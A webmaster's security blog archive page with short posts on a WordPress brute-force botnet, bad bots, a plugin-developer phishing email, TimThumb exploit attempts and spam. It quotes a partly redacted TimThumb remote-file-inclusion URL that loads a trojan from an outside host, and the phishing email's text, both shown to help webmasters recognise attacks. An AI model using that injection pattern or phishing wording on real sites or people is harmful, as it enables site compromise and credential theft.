Category Archives: Internet Security
Botnet Attacks WordPress Website
Apparent Botnet Attacked My WordPress Website
What appeared to be a botnet attacked one of my sites (tech.graphicline.co.za) this morning in a brute-force wp-login attempt from multiple IP addresses. This was the most coordinated attack against any of my sites I’ve experienced. Usually the hacker bots I see use up to 6 IP’s in these attacks – 146 IPs is serious stuff…
146 IP’s Used in Simultaneous Attack
The IP’s listed below are the guilty parties to this brute-force login attack on the site. The main attack started at 05h09 GMT this morning (November 25, 2012) and continued until 05h15 GMT. A second but less intense attacked followed; starting from 05h16 GMT tailing off until ending at 05h43 GMT
FreeWebMonitoring SiteChecker/0.1
Hacker Bot FreeWebMonitoring SiteChecker/0.1 Pays a Visit
Bad bot “FreeWebMonitoring SiteChecker/0.1 (+http://www.freewebmonitoring.com)” paid a visit to one of my websites yesterday from IP address 184.107.201.242 which belongs to Canadian service provider: Canada Montreal Thst Golf Inc.
The full range of IP’s owned by Canada Montreal Thst Golf Inc. is 184.107.0.0 - 184.107.255.255
This bot is not the bot used by freewebmonitoring.com. Their bot is “FreeWebMonitoring SiteChecker/0.2 (+http://www.freewebmonitoring.com/bot.html)”
Go Away Baidu and Yandex
Baidu and Yandex Bots Forbidden Access
That’s it folk, I have denied access to the Baidu and Yandex web spiders. I don’t want them crawling my sites, I don’t want them crawling my clients’ sites (unless the client wants them to of course). Both these bots do not follow advanced robots.txt disallow rules, and crawl areas of the sites I don’t want indexed… In particular I don’t want them continually searching my sites for non-existent RSS feeds and /trackback urls thus generating excessive page not found errors.
I am becoming stricter with web bots that do not comply with the more advanced robots.txt rules, eg “disallow /feed” and wildcards. Google obeys these rules, Bing obeys these rules, any other worthwhile search engine should also obey these rules.
What is Verify Compliance Page
verify-Compliance_Page | notified-Compliance_Page
I noticed a few 404 page not found errors in activity logs for several sites today using these strings; verify-Compliance_Page?aHR0cDovL3d3dy5ncmFwaGljbGluZS5jby56YS8= and notified-Compliance_Page with the same rubbish string on the end. When I find odd GET requests I invariably try to find out more information about what the ‘visitor’ is trying to do. Are they trying to hack, access forbidden areas, upload malware or post spam…
As far as verify-Compliance_Page and notified-Compliance_Page are concerned, the amount of substantiated information is notable only in it’s scarcity. So for any webmaster who is also looking for this information about these odd GET requests, this is what I was able to establish.
WordPress Plugin Phishing Scam
Phishing Scam Targets WordPress Plugin Developers
What may be the first phishing scam specifically targeting WordPress Plugin authors has been discovered. The scam comes in the form of an e-mail claiming the developers plugin has been removed from the WordPress Repository, and tells the plugin author to use the link in the mail to login and change their password.
The e-mail uses the Subject line “[WordPress.org Plugins] Urgent: Your Plugin Has Been Removed” and has this message content
Dear WordPress Plugin Developer,
Unfortunately, a plugin you are hosting has been temporarily removed from the WordPress repository. We are going to manually review your plugin because it has been reported for violating our Terms of Service. If your plugin does not get approved then it will be permanently removed from the WordPress repository.
You can check if your plugin has been approved or rejected at…
This is not an official WordPress email!
Microsoft Security Essentials
Microsoft Security Essentials Under Microscope
A look at Microsoft Security Essentials, the free anti-virus application from Microsoft. Is Microsoft Security Essentials any good? Will it protect a Windows PC from most common threats? Can MSE compete with commercial security applications?
Over the next few months we will see.
Annoyed with Commercial AV Software.
I have become increasingly annoyed with commercial anti-virus applications. They have become overpriced, use too much system resources, interfere with other applications, or slow down internet access. Worse still, none of the apps are able to detect every virus or malware… An example is Trojan Generic 24, which seems to be only detected by AVG (but doesn’t stop or remove it). Trend Micro Titanium and Norton AV don’t find all versions of this dangerous trojan.
Picasa Spoofed for Malware Injection
Hackers Using Picasa Spoof for Web Malware
Strange looking referer URLs and GET requests that appear to be Picasa are being used by hackers to find website vulnerabilities to 
inject malware or spam. Examining the details of the referer reveals something like this example /wp-content/themes/biznizz/thumb.php?src=http://picasa.com.jcibuenos*****.com.ar/2.php (stars replace the actual characters in string for your safety – leads nowhere). This particular example will inject malware using the WordPress TimThumb exploit. The file 2.php contains a trojan horse!
Picasa is of course picasa.google.com, but the similarity can lead the unwary to disregard the source. These strings are typically long, similar in appearance to a Google search request string. Any URL containing this odd string (or similar) should be regarded as extremely suspicious, and the IP should at least be checked for known bad behaviour and blocked from accessing the website. The string is often seen along with WordPress TimThumb exploit attempts.
Read the rest of this entry
Trackback Spam
A Rising Trend – Trackback or Pingback Spam
What is Trackback Spam? Trackback spam is a way for spammers to garner backlinks from your posts to their website. I categorise trackback spam into several groups. Firstly, false trackback spam. Then we find the obscured related article link. Finally mass trackback spam.
False Trackback Spam
- Image from Rice University – Computer Security Lab
This is the most insidious, and unethical of the three groups. False trackback spam is when a spammer creates a list of related article links, publishes the post, so a ping is sent to your blog resulting in a trackback (or pingback) that the spammer hopes will get published, either automatically if moderation is not in place, or by a blogger thinking, “how nice of this person to link to my post”.
After the ping has been sent, the spammer then REMOVES the links to your article… This is a trackback spam method I see more often lately.
Obscured Links
TimThumb Exploit
TimThumb PHP WordPress Vulnerability
An image re-size script timthumb.php released by Google and used by many Word Press (self hosted) themes and plugins had a vulnerability allowing hackers to load malicious script files to a Word Press website.
Hackers use automated bots to trawl sites looking for timthumb.php files in certain folders e.g. wp-content/themes/ and /wp-content/plugins. Once the bot has found timthumb.php the hacker will try to attack the site.
The vulnerability was discovered in August 2011, and the file was immediately patched to prevent these attacks. Judging by the large number of bots still looking for these files, there must be many un-patched versions still used on Word Press blogs and sites. Read the rest of this entry
Graphicline
+Mike Otgaar
Follow Me on Facebook
Follow Me on Twitter
Me on Linked-In
About Me
Intelligent Verbatim
Graphicline RSS
Weird Spam by E-Mail
Mar 31
Posted by Mike
Nonsense Spam
Just when I thought I’d seen it all, I get some really weird spam e-mail from a webform response. Every possible field filed in with a website URL, or nonsense text. And there are lot’s of fields. Stranger still, the mail form responds to a promotion that ended in October last 2011…
Email: wxgokb@ hswhrm.com
First Name: zmcpff
Last Name: zmcpff
Company: zmcpff
Bus Tel: 5283678809
Cell: 2194836070
Post Address L2: http: //thumekeyzrdi.com/
Suburb: http: //thumekeyzrdi.com/
City: New York
Code: 9804
Street Address: http: //thumekeyzrdi.com/
Street Address L2: http: //thumekeyzrdi.com/
Suburb: http: //thumekeyzrdi.com/
City: New York
Code: 9804
Ownership Type: Self Employed (Sole Trader)
Business Sector: Clothing/Textile
Employees: 1-3
Description of Business: Gog0rh <a href=”http: //geqsrfadufdz.com/”>geqsrfadufdz</a>http: //chxxwqcqcloy.com/]chxxwqcqcloy, http: //zadxoljxogol.com/zadxoljxogol, http: //xynmrvbkogwj.com/
Read the rest of this entry →
Posted in Spam
Leave a Comment
Tags: E-mail spam, spam, Spam Comments, Spambot